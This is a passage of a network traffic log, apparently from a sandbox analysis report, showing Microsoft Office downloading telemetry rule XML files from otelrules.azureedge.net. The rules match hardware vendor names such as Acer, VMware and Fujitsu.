2024-11-05 17:45:58 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49750	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: ea0f8f90-301e-0020-7758-2e6299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-15869dbbcc68l9dbhC1DFWgc3n0000000250000000005byk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:58 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49751	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:57 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: def873b9-d01e-0065-46f7-2cb77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-16547b76f7fr4g8xhC1DFW9cqc00000004ng00000000fgxg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:58 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49752	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:58 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: e16c3d14-801e-00a3-050a-2d7cfb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-16547b76f7f4k79zhC1DFWu9y000000005e000000000suc4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:45:58 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49753	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:58 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 4fd4ee51-801e-00a0-0601-2f2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-17df447cdb5g2j9ghC1DFWev0800000001ng000000000f19 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:58 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49754	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:58 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 183719b9-d01e-00a1-43c3-2c35b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-16547b76f7fwvr5dhC1DFW2c9400000005dg000000007ha9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:58 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49755	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:58 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:58 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 6bd3c087-001e-000b-13fd-2c15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-16547b76f7fq9mcrhC1DFWq15w00000005cg00000000pqqd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:58 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49756	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:58 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:59 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:58 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: bf748f03-f01e-001f-5f5f-2e5dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174558Z-17df447cdb5rrj6shC1DFW6qg400000001d000000000u0ke x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:59 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49757	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:58 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:59 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:59 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174559Z-16547b76f7fmbrhqhC1DFWkds800000005kg000000005svv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:59 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49758	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:59 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:59 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:59 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 11ffd83c-b01e-003d-6a61-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174559Z-15869dbbcc6qwghvhC1DFWssds00000001tg000000001bx0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:59 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49759	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:59 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:59 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:59 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174559Z-16547b76f7f9rdn9hC1DFWfk7s00000005fg000000009vkr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:59 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49760	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:59 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:45:59 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:45:59 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 1afe4fdc-201e-0085-035c-2e34e3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174559Z-17df447cdb59mt7dhC1DFWqpg400000001k000000000gyp5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:45:59 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49761	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:45:59 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
